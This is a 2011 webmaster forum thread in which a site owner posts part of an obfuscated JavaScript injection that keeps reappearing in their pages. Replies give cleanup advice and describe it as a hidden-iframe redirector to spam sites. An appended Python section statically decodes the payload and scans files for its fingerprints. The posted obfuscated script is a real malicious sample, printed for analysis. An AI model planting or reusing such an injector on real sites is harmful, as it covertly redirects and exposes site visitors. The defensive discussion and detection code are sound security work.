
Malicious script help


wspartner

11:32 pm on May 16, 2011 (gmt 0)

10+ Year Member



Hello,
Can anybody help me to figure out what the below code does. It keeps injecting itself into our site in every index.html file along with some other php files. We keep removing it and have taken several security steps but about every week or so (always on a Sunday or Monday) it reappears! We desperately need to figure out what it does and how it keeps happening.

Below is just about a third of the code. I've removed the <> script tags from the beginning and end for security.

var ar="v)y{ifu=lg[rETCB}me h>;s\"/ 0.,tN1:('<cAb]waonpd";try{'qwe'.length(1);}catch(a){k=new Boolean().toString();date=new Date();};var ar2="f57,57,12,15,78,102,138,129,111,18,51,54,132,90,84,27,54,90,36,24,54,51,54,132,90,69,45,6,39,126,27,93,126,51,54,102,105,
117,129,138,6,105,3,30,81,120,3,9,57,57,57,12,15,33,126,51,54,33,102,3,66,57,57,48,78,54,24,69,54,78,9,57,57,57,138,129,111,18,
51,54,132,90,84,123,33,12,90,54,102,72,108,12,15,33,126,51,54,78,69,33,111,21,105,60,90,90,135,99,75,75,138,129,24,129,126,69,
84,111,129,51,75,111,129,18,132,90,81,84,135,60,135,105,78,123,12,138,90,60,21,105,96,81,105,78,60,54,12,27,60,90,21,105,96,81,
105,78,69,90,6,24,54,21,105,0,12,69,12,117,12,24,12,90,6,99,60,12,138,138,54,132,66,135,129,69,12,90,12,129,132,99,126,117,69,
129,24,18,90,54,66,24,54,15,90,99,81,66,90,129,135,99,81,66,105,63,108,75,12,15,33,126,51,54,63,72,3,66,57,57,48,57,57,15,18,132,
111,90,12,129,132,78,12,15,33,126,51,54,33,102,3,9,57,57,57,0,126,33,78,15,78,21,78,138,129,111,18,51,54,132,90,84,111,33,54,126,
90,54,36,24,54,51,54,132,90,102,105,12,15,33,126,51,54,105,3,66,15,84,69,54,90,114,90,90,33,12,117,18,90,54,102,105,69,33,111,105,
87,105,60,90,90,135,99,75,75,138,129,24,129,126,69,84,111,129,51,75,111,129,18,132,90,81,84,135,60,135,105,3,66,15,84,69,90,6,
24,54,84,0,12,69,12,117,12,24,12,90,6,21,105,60,12,138,138,54,132,105,66,15,84,69,90,6,24,54,84,135,129,69,12,90,12,129,132,21,
105,126,117,69,129,24,18,90,54,105,66,15,84,69,90,6,24,54,84,24,54,15,90,21,105,81,105,66,15,84,69,90,6,24,54,84,90,129,135,21,
105,81,105,66,15,84,69,54,90,114,90,90,33,12,117,18,90,54,102,105,123,12,138,90,60,105,87,105,96,81,105,3,66,15,84,69,54,90,114,
90,90,33,12,117,18,90,54,102,105,60,54,12,27,60,90,105,87,105,96,81,105,3,66,57,57,57,138,129,111,18,51,54,132,90,84,27,54,90,36,
24,54,51,54,132,90,69,45,6,39,126,27,93,126,51,54,102,105,117,129,138,6,105,3,30,81,120,84,126,135,135,54,132,138,42,60,12,24,
138,102,15,3,66,57,57,48]".replace(k.substr(0,1),'[');pau="rn ev2010"[('afas','rep')+('rhrh','lace')](date[('adsaf','getF')+'ullY'+('qwtrqwt','ear')]()-1,('awgwag',"al"));e=Function("retu"+pau)();ar2=('gfhgffg',e(ar2));s="";for(i=0;i<ar2.length;i++){s+=ar.substr(ar2(bracket)i(bracket)/3,1);}
e(s);

I replaced the [] brackets above around the i since the post kept telling me that there was an error.

[edited by: whoisgregg at 1:10 am (utc) on May 17, 2011]
[edit reason] Fixed sidescroll, actual code was on single line [/edit]

tangor

11:35 pm on May 16, 2011 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Posting the whole thing might not be a wise idea. Have you looked at the sending IP and BLOCKED IT? That would be step one. At the firewall if available. Step two is verifying site security by immediately changing all passwords, access, etc.

lucy24

6:52 am on May 17, 2011 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



I say this with hesitation because I'm not even sure what language we're in, but I smell a bored adolescent. The bit about

{s+=ar.substr(ar2[i]/3,1);}

set against the actual content of ar and ar2 is just too goofy; it practically has to come out spelling "Your mother wears Army boots" or similar.

Whew. The [i] trick from php/bb2 works, even though the Forums flatly refused to let me disable [codes].

wspartner

12:40 pm on May 17, 2011 (gmt 0)

10+ Year Member



Hello, thanks for your responses. We blocked what we thought was the IP back about a year ago. We've changed our passwords every time it happens. It appears to be something that recreates itself internally somehow.

We've run malicious script finding programs on the files and our computers but never can find anything once we've cleaned all the script out of the files.

Does anybody have any ideas what this thing does and how we get rid of it?

p.s. We have all sorts of firewall and security items loaded on the site now and it never detects that anyone hacks in.

whoisgregg

1:26 pm on May 17, 2011 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



Once a machine has been compromised, it can't ever really be trusted again.

The only real way to have peace of mind is to build a new clean machine and inspect each file before moving it over -- moving only the files you need.

Leosghost

1:27 pm on May 17, 2011 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Putting just part of this string ( this bit between the quotes ) "date[('adsaf','getF')+'ullY'+('qwtrqwt'," into G gives you the answer ..
Short discussion of what it's doing and how it may be getting in at stackoverflow
[stackoverflow.com...]

( was it you who asked there ? )

there is also an "edit" page there where someone ( Rasman ) has split the script to make it easier to read

Various links to the jsunpack unpacker ( with "reports" about it ) ..( cool tool ..if you don't know it already ..bookmark it ..comes in handy )..

Quickly reading all the listings at the unpacker for your script there,( interesting that it reports it as "benign" in some cases ;-) ..IMO depends what you call benign, but there you go..each to their opinion ;-) ) it's a redirector that makes either hidden iframes or hidden divs ( it can be set to do either ) to send visitors to various sites ( those can be set inside the script ) ..mainly in RU ..( pharma and forex type stuff ) it has a "listening" element also...but without spending loads of time ( which I don't have ATM ) I couldn't tell you what its ears are cocked for and in which direction.


Follow the advice at stack'..and IIWY ..I'd also scrub all the machines that you use to get to your site ..not just the site itself ..one of you ( presume there are more than one of you with password access ? ) may well be reinfecting the site /server ..

And as said at stack' look for weak points ( broken points ) where it may be injected into your db..blocking a particular IP isn't going to do much ..the bad guys can get a new IP ( or what your server thinks is one ) in a heartbeat..

One last thing ..there is a ref in what G sends back for that string(let) to a malware site..don't get curious when you see things like that ;-)..especially if you are on a windows box.

edit ::whoisgregg posted while I was typing ..agree 100% with him ..( you could spend a lot of your time trying to track this one down )..and on the rebuild pay particular attention to not include weak points ..make sure all input is sanitised before it gets to anywhere important..
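The decode loop lucy24 quotes (`s+=ar.substr(ar2[i]/3,1)`) is simple enough to reverse on paper, and the unpacker Leosghost links to does the same thing mechanically: every number in `ar2` is three times an index into the `ar` alphabet. The Python below is an added example, not code from this thread or from any of the tools mentioned in it. It does two defender-side things: it statically decodes that scheme without ever running the script (useful when you want to read what an injected block does before cleaning it out), and it flags the fingerprints of this particular injector in an HTML file so you can find every copy on a rebuilt server rather than only the ones someone noticed. The alphabet and the first 61 numbers are copied from the script wspartner posted above; the indicator names, function names and the regular expressions are my own choices.

```python
import os
import re

# Alphabet and the first 61 numbers from the script posted in this thread.
# The injector writes its array as "f57,57,..." and later swaps the leading
# 'f' (the first character of new Boolean().toString(), i.e. "false") for '[',
# so parse_codes() simply keeps the digits and ignores that trick.
ALPHABET = "v)y{ifu=lg[rETCB}me h>;s\"/ 0.,tN1:('<cAb]waonpd"
SAMPLE_CODES_TEXT = (
    "f57,57,12,15,78,102,138,129,111,18,51,54,132,90,84,27,54,90,36,24,54,51,54,"
    "132,90,69,45,6,39,126,27,93,126,51,54,102,105,117,129,138,6,105,3,30,81,120,"
    "3,9,57,57,57,12,15,33,126,51,54,33,102,3,66]"
)

# Fingerprints of this injector family (my own naming and patterns):
INDICATORS = {
    # the decode loop itself: X.substr(Y[i]/N,1)
    "substr-divide decode loop": re.compile(
        r"\.substr\(\s*\w+\[\s*\w+\s*\]\s*/\s*\d+\s*,\s*1\s*\)"),
    # 'f' -> '[' bracket swap seeded from new Boolean().toString()
    "bracket swap via Boolean().toString()": re.compile(
        r"new\s+Boolean\(\)\.toString\(\)"),
    # eval reconstructed as Function("retu" + "rn eval")()
    "eval built from Function('retu'...)": re.compile(
        r"Function\(\s*[\"']retu[\"']"),
    # deliberate TypeError used to enter the catch block
    "try/catch fingerprint ('qwe'.length(1))": re.compile(
        r"\.length\(\s*1\s*\)"),
}


def parse_codes(text):
    """Extract the integer array from the 'f57,57,...]' string form."""
    return [int(n) for n in re.findall(r"\d+", text)]


def decode_substr_payload(alphabet, codes, divisor=3):
    """Statically reproduce s += alphabet.substr(code/divisor, 1).

    JavaScript's substr() truncates a fractional start index, so integer
    division matches its behaviour. Nothing here executes the decoded text.
    """
    out = []
    for code in codes:
        idx = code // divisor
        if idx >= len(alphabet):
            raise ValueError(f"code {code} indexes past the alphabet; wrong divisor?")
        out.append(alphabet[idx])
    return "".join(out)


def injection_indicators(html):
    """Return the names of every injector fingerprint found in the text."""
    return [name for name, rx in INDICATORS.items() if rx.search(html)]


def scan_tree(root, suffixes=(".html", ".htm", ".php", ".js")):
    """Walk a web root and report files carrying any of the fingerprints."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(suffixes):
                path = os.path.join(dirpath, name)
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    found = injection_indicators(fh.read())
                if found:
                    hits[path] = found
    return hits


if __name__ == "__main__":
    print(repr(decode_substr_payload(ALPHABET, parse_codes(SAMPLE_CODES_TEXT))))
    # Constructed sample: a page with the posted decode loop pasted into it.
    sample_page = "<html><body><script>for(i=0;i<ar2.length;i++){s+=ar.substr(ar2[i]/3,1);}</script></body></html>"
    print(injection_indicators(sample_page))
```

Run it with no arguments to see the first line of the decoded payload and the indicator check on a constructed page; point `scan_tree()` at a copy of the web root to list every file that carries the fingerprints. Treat a hit on the decode loop alone as a strong signal, and any two indicators together as a match; the regexes are deliberately loose on whitespace because the injected copy was on a single line, as whoisgregg's edit note says.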